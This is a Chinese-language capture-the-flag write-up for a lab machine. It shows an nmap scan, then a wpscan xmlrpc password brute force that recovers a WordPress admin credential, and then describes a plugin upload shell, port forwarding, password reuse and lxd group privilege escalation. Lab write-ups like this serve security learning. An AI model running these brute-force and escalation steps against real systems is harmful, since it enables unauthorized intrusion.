Skip to main content

For Business Reasons

端口扫描

root@ip-10-10-10-19:~# nmap -sTCV -p- --min-rate 1000 10.10.21.37

Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-19 09:10 GMT
Nmap scan report for ip-10-10-21-37.eu-west-1.compute.internal (10.10.21.37)
Host is up (0.00028s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MilkCo Test/POC site – Just another WordPress site
2377/tcp closed swarm
7946/tcp closed unknown
MAC Address: 02:53:07:A6:C9:27 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.77 seconds

80

在访问之后我发现这个站点是在进行 Wordpress , 因此我直接开始使用 wpscan 进行扫描, 当然先进行的暴力破解, 结果发现确实存在弱密码

root@ip-10-10-10-19:~/forbusinessreasons#  wpscan --password-attack xmlrpc -t 20 -U sysadmin  -P `locate rockyou.txt`  --url http://10.10.21.37/
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - sysadmin / milkshake                                                                                                                                         
Trying sysadmin / kenzie Time: 00:04:20 <                                                                                       > (1680 / 14346071)  0.01%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: sysadmin, Password: milkshake

访问后台界面, 开始上传Shell 但是不允许编辑页面, 因此只能通过上传插件来获取一个 Shell

后渗透

www-data (172.18.0.3)

image-20240709231204071

获取到 Shell 之后, 开始一系列的枚举, 我确定目前是在一个 docker 环境中, 但是没有发现什么可以利用的地方, 那就端口转发尝试密码重用, 因为题目的描述中也一直在说, 目标的站点存在密码重用的问题, 同时也值得一说这 docker 环境是真TM安全

www-data (172.18.0.3) —> sysadmin(172.18.0.1)

上传自己喜欢的端口转发工具, 之后开始进行端口转发

image-20240709231213972

sysadmin(172.18.0.1) —> root(172.18.0.1)

可以发现 sysadmin 用户是 lxd 组内的用户, 因此可以利用此来完成提权

image-20240709231223181